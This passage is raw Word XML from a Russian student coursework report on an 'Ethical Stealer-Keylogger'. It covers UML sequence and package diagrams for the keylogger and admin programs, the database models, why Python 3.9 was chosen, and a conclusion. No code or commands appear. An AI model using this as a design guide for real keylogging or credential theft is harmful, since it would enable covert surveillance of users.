            <wp:effectExtent l="0" t="0" r="381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C75" w14:textId="6B77BCEF" w:rsidR="00005435" w:rsidRPr="009C2938" w:rsidRDefault="00005435" w:rsidP="00005435">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 7 – Первая часть диаграммы последовательности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B981A54" w14:textId="0ACE7363" w:rsidR="00005435" w:rsidRDefault="00D2259E" w:rsidP="00005435">
      <w:r>
        <w:t xml:space="preserve">На рисунке 8 изображена вторая часть диаграммы последовательности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2259E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">реализована для функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D2259E">
        <w:t>process_key_presses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D2259E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">программы </w:t>
      </w:r>
      <w:r w:rsidRPr="00960B00">
        <w:t>Stealer_Keylogger.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00D2259E">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2D5E87" w14:textId="1654608B" w:rsidR="00D2259E" w:rsidRDefault="00D2259E" w:rsidP="00D225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5E307" wp14:editId="69A96812">
            <wp:extent cx="5939790" cy="559181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888" w14:textId="186D6716" w:rsidR="00D2259E" w:rsidRPr="00D2259E" w:rsidRDefault="00D2259E" w:rsidP="00D2259E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 8 - Вторая часть диаграммы последовательности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3818727C" w14:textId="38EDC4F5" w:rsidR="00D2259E" w:rsidRDefault="00F77DE1" w:rsidP="00F77DE1">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc155993246"/>
      <w:bookmarkStart w:id="27" w:name="_Toc155993728"/>
      <w:r>
        <w:t>2.3.4 Концептуальная модель БД</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="14A9C18D" w14:textId="6A25346E" w:rsidR="00F77DE1" w:rsidRDefault="00E87121" w:rsidP="00D2259E">
      <w:r>
        <w:t>В виду наличия БД была реализована концептуальная модель.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30594F4E" w14:textId="448F4F17" w:rsidR="00E87121" w:rsidRDefault="00E87121" w:rsidP="00D2259E">
      <w:r>
        <w:t>На рисунке 9 изображена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5]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E87121">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D43737F" w14:textId="642C9AB4" w:rsidR="00E87121" w:rsidRDefault="00E87121" w:rsidP="00E871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320C" wp14:editId="606815E2">
            <wp:extent cx="5939790" cy="27819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6F3" w14:textId="75B8C317" w:rsidR="00E87121" w:rsidRDefault="00E87121" w:rsidP="00E87121">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 9 –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</w:p>
    <w:p w14:paraId="4C2144E9" w14:textId="44B8750E" w:rsidR="00E87121" w:rsidRDefault="00501655" w:rsidP="00E87121">
      <w:r>
        <w:t xml:space="preserve">Также на рисунке 10 изображена </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ER</w:t>
      </w:r>
      <w:r w:rsidRPr="00501655">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>диаграмма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2]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348B3431" w14:textId="6BE58F7F" w:rsidR="00501655" w:rsidRDefault="00501655" w:rsidP="00501655">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31D352E7" wp14:editId="608B082A">
            <wp:extent cx="5939790" cy="29413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3EB" w14:textId="65A2564D" w:rsidR="00501655" w:rsidRDefault="00501655" w:rsidP="00501655">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 10 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ER</w:t>
      </w:r>
      <w:r w:rsidRPr="00501655">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Диаграмма БД «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00501655">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Project</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0901B2FD" w14:textId="1DFB80B5" w:rsidR="00E87121" w:rsidRPr="00D2259E" w:rsidRDefault="00E81606" w:rsidP="00E81606">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc155993247"/>
      <w:bookmarkStart w:id="29" w:name="_Toc155993729"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3 Задачи разработчика</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="05F77984" w14:textId="6CCB7EB2" w:rsidR="00A92BA6" w:rsidRPr="00A92BA6" w:rsidRDefault="00A92BA6" w:rsidP="00A92BA6">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc155993248"/>
      <w:bookmarkStart w:id="31" w:name="_Toc155993730"/>
      <w:r>
        <w:t>3.1 Подобранные</w:t>
      </w:r>
      <w:r w:rsidR="00462B9C">
        <w:t xml:space="preserve"> в соответствии с требованиями к системному ПО</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> языки программирования</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFC1ABB" w14:textId="6B6EB274" w:rsidR="00C56308" w:rsidRPr="005C106D" w:rsidRDefault="00C56308" w:rsidP="00C56308">
      <w:r w:rsidRPr="005C106D">
        <w:t xml:space="preserve">В рамках разработки </w:t>
      </w:r>
      <w:r>
        <w:t>продукта</w:t>
      </w:r>
      <w:r w:rsidRPr="005C106D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A637D8">
        <w:t xml:space="preserve">«Этичный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A637D8">
        <w:t>Стилер-Кейлоггер</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r w:rsidRPr="005C106D">
        <w:t xml:space="preserve">был сделан выбор в пользу языка программирования </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C106D">
        <w:t>Python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C106D">
        <w:t xml:space="preserve"> 3.9. Несколько аспектов стали ключевыми при таком выборе:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159A4F27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оддержка операционных систем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хорошо поддерживается на различных операционных системах, включая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C56308">
        <w:t>Windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C56308">
        <w:t xml:space="preserve"> 10 и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C56308">
        <w:t>Windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C56308">
        <w:t xml:space="preserve"> 11, что соответствует требованиям к системному ПО, предъявляемым в рамках нашего проекта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB4F2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Библиотеки и инструменты:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56308">
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C56308">
        <w:t>Python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C56308">
        <w:t xml:space="preserve"> 3.9 представлен обширный набор библиотек и инструментов, что позволяет эффективно решать задачи, а также обеспечивает удобство и скорость разработки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0777752A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СУБД: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56308">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56308">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.9 предоставляет различные библиотеки, которые позволяют работать с базами данных в рамках СУБД </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56308">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56308">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>, это является важным фактором, влияющим на выбор этого языка программирования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD68D6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Удобство работы с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C56308">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C56308">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> репозиторием:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56308">
        <w:t xml:space="preserve"> Использование программного комплекса «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C56308">
        <w:t>PyCharm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C56308">
        <w:t xml:space="preserve">», который предоставляет широкий набор инструментов для удобной работы с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C56308">
        <w:t>GitHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C56308">
        <w:t xml:space="preserve"> репозиторием, облегчает совместную работу участников команды, упрощая процессы разработки и управления изменениями в проекте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFA496F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ростота и читаемость кода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выделяется среди других ЯП своей простотой и читаемостью, что позволяет легко понимать и дорабатывать код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DFEB96" w14:textId="77777777" w:rsidR="00C56308" w:rsidRPr="005C106D" w:rsidRDefault="00C56308" w:rsidP="00C56308">
      <w:r w:rsidRPr="005C106D">
        <w:t xml:space="preserve">Выбор </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C106D">
        <w:t>Python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C106D">
        <w:t xml:space="preserve"> 3.9 был обоснован его универсальностью, широким набором инструментов, удобством разработки, простотой в изучении и читаемостью кода</w:t>
      </w:r>
      <w:r>
        <w:t>, а также совместимостью с требованиями, предъявленными к системному ПО (ОС, СУБД).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6969B127" w14:textId="09AFDA2E" w:rsidR="00AB48D3" w:rsidRPr="009C2938" w:rsidRDefault="00C2264D" w:rsidP="00C35CFB">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc155993249"/>
      <w:bookmarkStart w:id="33" w:name="_Toc155993731"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r w:rsidR="00C35CFB">
        <w:t xml:space="preserve">Диаграмма пакетов </w:t>
      </w:r>
      <w:r w:rsidR="00C35CFB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="3A51BE6C" w14:textId="463C37FB" w:rsidR="00C35CFB" w:rsidRDefault="00563166" w:rsidP="00C35CFB">
      <w:r>
        <w:t xml:space="preserve">Была реализована диаграмма пакетов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidRPr="00563166">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для нашего продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3C6C08" w14:textId="0E3CAB1B" w:rsidR="00563166" w:rsidRDefault="0006782B" w:rsidP="00C35CFB">
      <w:r>
        <w:t xml:space="preserve">Диаграмма пакетов разделена на три части, первая часть относится к программе </w:t>
      </w:r>
      <w:r w:rsidRPr="0006782B">
        <w:t>Stealer_Keylogger.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, вторая часть к программе </w:t>
      </w:r>
      <w:r w:rsidRPr="0006782B">
        <w:t>Administrator_Interface_Tools.py</w:t>
      </w:r>
      <w:r>
        <w:t>, третья часть является общей схемой, показывающей диаграмму пакетов для всего продукта</w:t>
      </w:r>
      <w:r w:rsidR="00780BD6">
        <w:t xml:space="preserve">, ссылка на файл диаграммы </w:t>
      </w:r>
      <w:hyperlink w:anchor="_СПИСОК_ИСПОЛЬЗОВАННОЙ_ЛИТЕРАТУРЫ" w:history="1">
        <w:r w:rsidR="00780BD6" w:rsidRPr="00780BD6">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>[6]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3962719F" w14:textId="52336BD0" w:rsidR="0006782B" w:rsidRDefault="0006782B" w:rsidP="00C35CFB">
      <w:r>
        <w:t xml:space="preserve">На рисунке 11 изображена диаграмма пакетов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidRPr="0006782B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для программы </w:t>
      </w:r>
      <w:r w:rsidRPr="0006782B">
        <w:t>Stealer_Keylogger.py</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640952B2" w14:textId="6EA21131" w:rsidR="0006782B" w:rsidRDefault="00314DD1" w:rsidP="00314D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CCACF1" wp14:editId="6681B0A8">
            <wp:extent cx="5939790" cy="426275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201" w14:textId="5374C1AC" w:rsidR="00314DD1" w:rsidRDefault="00314DD1" w:rsidP="00314DD1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 11 – Первая часть диаграммы пакетов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (программа</w:t>
      </w:r>
      <w:r w:rsidRPr="00314DD1">
        <w:t xml:space="preserve"> Stealer_Keylogger.py</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4136BD40" w14:textId="29E97F32" w:rsidR="00314DD1" w:rsidRDefault="000700A2" w:rsidP="00314DD1">
      <w:r>
        <w:t>В виду слишком большого размера частей и всей диаграммы в общем рекомендуется просматривать диаграммы в репозитории.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC15BAE" w14:textId="636E4DFE" w:rsidR="000700A2" w:rsidRDefault="000700A2" w:rsidP="00314DD1">
      <w:r>
        <w:t xml:space="preserve">На рисунке 12 изображена диаграмма пакетов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidRPr="000700A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC5EFF">
        <w:t xml:space="preserve">для программы </w:t>
      </w:r>
      <w:r w:rsidR="00B17D9F" w:rsidRPr="008F1CD3">
        <w:t>Administrator_Interface_Tools.py</w:t>
      </w:r>
      <w:r w:rsidR="00B17D9F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B2F94B" w14:textId="6BB9DE27" w:rsidR="00B17D9F" w:rsidRDefault="00B17D9F" w:rsidP="00B17D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B37ED" wp14:editId="39B8BAC3">
            <wp:extent cx="5939790" cy="299021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472" w14:textId="7565F7A2" w:rsidR="00B17D9F" w:rsidRDefault="00B17D9F" w:rsidP="00B17D9F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 12 – Вторая часть диаграммы пакетов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidRPr="00B17D9F">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">программа </w:t>
      </w:r>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Administrator_Interface_Tools.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00B17D9F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D9FEAE" w14:textId="0B8E2F5F" w:rsidR="00B17D9F" w:rsidRDefault="0020419B" w:rsidP="00B17D9F">
      <w:r>
        <w:t xml:space="preserve">На рисунке 13 изображена диаграмма пакетов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidRPr="0020419B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для всего продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BBF473" w14:textId="339FBB0E" w:rsidR="0020419B" w:rsidRDefault="0020419B" w:rsidP="0020419B">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B0EB8BA" wp14:editId="4E4AB8E2">
            <wp:extent cx="5939790" cy="315658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7C7" w14:textId="1A1D367C" w:rsidR="0020419B" w:rsidRDefault="0020419B" w:rsidP="0020419B">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 13 – Третья часть диаграммы пакетов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidRPr="0020419B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(общая схема для всего продукта)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBFE9F8" w14:textId="05C6681C" w:rsidR="0020419B" w:rsidRPr="0020419B" w:rsidRDefault="001B0A15" w:rsidP="001B0A15">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc155993250"/>
      <w:bookmarkStart w:id="35" w:name="_Toc155993732"/>
      <w:r>
        <w:t>3.3 Диаграмма физической модели БД</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="423B3D39" w14:textId="6997BC43" w:rsidR="00F1280D" w:rsidRDefault="00F1280D" w:rsidP="00573C63">
      <w:r>
        <w:t>На рисунке 14 изображена диаграмма физической модели БД</w:t>
      </w:r>
      <w:r w:rsidR="00551DEC" w:rsidRPr="00551DEC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00551DEC">
        <w:t xml:space="preserve">ссылка </w:t>
      </w:r>
      <w:hyperlink w:anchor="_СПИСОК_ИСПОЛЬЗОВАННОЙ_ЛИТЕРАТУРЫ" w:history="1">
        <w:r w:rsidR="00551DEC" w:rsidRPr="00780BD6">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>[</w:t>
        </w:r>
        <w:r w:rsidR="00780BD6" w:rsidRPr="00780BD6">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00551DEC" w:rsidRPr="00780BD6">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C88F7F" w14:textId="04FCB1D5" w:rsidR="00F1280D" w:rsidRDefault="00F1280D" w:rsidP="00F1280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9D0BA" wp14:editId="6A43618B">
            <wp:extent cx="5939790" cy="30416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A50" w14:textId="33B1393F" w:rsidR="00F1280D" w:rsidRDefault="00F1280D" w:rsidP="00F1280D">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 14 – Диаграмма физической модели БД</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EDE4C1" w14:textId="3B597F01" w:rsidR="00F1280D" w:rsidRPr="00B179AB" w:rsidRDefault="00B179AB" w:rsidP="00B179AB">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc155993251"/>
      <w:bookmarkStart w:id="37" w:name="_Toc155993733"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ЗАКЛЮЧЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="287C3F32" w14:textId="1A4B3A34" w:rsidR="00303942" w:rsidRDefault="001F1B5A" w:rsidP="00B179AB">
      <w:r>
        <w:t xml:space="preserve">В ходе выполнения курсовой работы нами была успешно разработана жизнеспособная версия продукта «Этичный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Стилер-Кейлоггер</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">». В процессе разработки наша команда смогла отработать приемы и способы взаимодействия посредством </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C0B6F" w:rsidRPr="006C0B6F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C0B6F">
        <w:t>репозитория, в котором имеет возможность работать несколько участников</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1B5A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56837DE5" w14:textId="25EC9DC7" w:rsidR="00915BC3" w:rsidRPr="00F700E2" w:rsidRDefault="00915BC3" w:rsidP="00B179AB">
      <w:r>
        <w:t xml:space="preserve">Также </w:t>
      </w:r>
      <w:r w:rsidR="006C0B6F">
        <w:t xml:space="preserve">нами была изучена нотация </w:t>
      </w:r>
      <w:r w:rsidR="006C0B6F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidR="006C0B6F">
        <w:t xml:space="preserve">, рассмотрены и созданы некоторые виды диаграмм из этой нотации, которые помогают лучше разобраться в структуре нашего итогового продукта. </w:t>
      </w:r>
      <w:r w:rsidR="00F700E2">
        <w:t xml:space="preserve">Помимо нотации </w:t>
      </w:r>
      <w:r w:rsidR="00F700E2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidR="00F700E2" w:rsidRPr="00F700E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F700E2">
        <w:t>мы также изучили другие нотации, которые нужны для проектирования баз данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8CB04" w14:textId="46E09161" w:rsidR="006C0B6F" w:rsidRDefault="006C0B6F" w:rsidP="00B179AB">
      <w:r>
        <w:t>В будущем мы могли бы доработать продукт, дополнив</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0B6F">
        <w:t xml:space="preserve"> его новым </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">функциями и особенностями, сделав его структуру более современной и соответствующей </w:t>
      </w:r>
      <w:r w:rsidR="00020184">
        <w:t>текущим</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> стандарт</w:t>
      </w:r>
      <w:r w:rsidR="00020184">
        <w:t>ам.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00020184">
        <w:t>Э</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">то приложение </w:t>
      </w:r>
      <w:r w:rsidR="00674F5C">
        <w:t>может послужить хорошим кейсом в нашем резюме</w:t>
      </w:r>
      <w:r w:rsidR="00D105E5">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00674F5C">
        <w:t xml:space="preserve"> как будущих специалистов по информационной безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EA5323" w14:textId="5FD6C257" w:rsidR="00066491" w:rsidRDefault="00066491">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEA70C7" w14:textId="3896C18C" w:rsidR="00674F5C" w:rsidRDefault="0015575C" w:rsidP="0015575C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_СПИСОК_ИСПОЛЬЗОВАННОЙ_ЛИТЕРАТУРЫ"/>
      <w:bookmarkStart w:id="39" w:name="_Toc155993252"/>
      <w:bookmarkStart w:id="40" w:name="_Toc155993734"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>СПИСОК ИСПОЛЬЗОВАНН</w:t>
      </w:r>
      <w:r w:rsidR="00FF74F4">
        <w:t>ЫХ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidR="00FF74F4">
        <w:t xml:space="preserve"> ИСТОЧНИКОВ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="625926A5" w14:textId="1592D745" w:rsidR="0015575C" w:rsidRPr="00F431EF" w:rsidRDefault="007B1DD4" w:rsidP="0015575C">
      <w:r>
        <w:t xml:space="preserve">1. Онлайн репозиторий </w:t>
      </w:r>
      <w:r w:rsidR="00573C07">
        <w:t>проекта</w:t>
      </w:r>
      <w:r w:rsidR="00573C07" w:rsidRPr="00573C07">
        <w:t>: [</w:t>
      </w:r>
      <w:r w:rsidR="00573C07">
        <w:t>Электронный ресурс.</w:t>
      </w:r>
      <w:r w:rsidR="00573C07" w:rsidRPr="00573C07">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00573C07">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F431EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
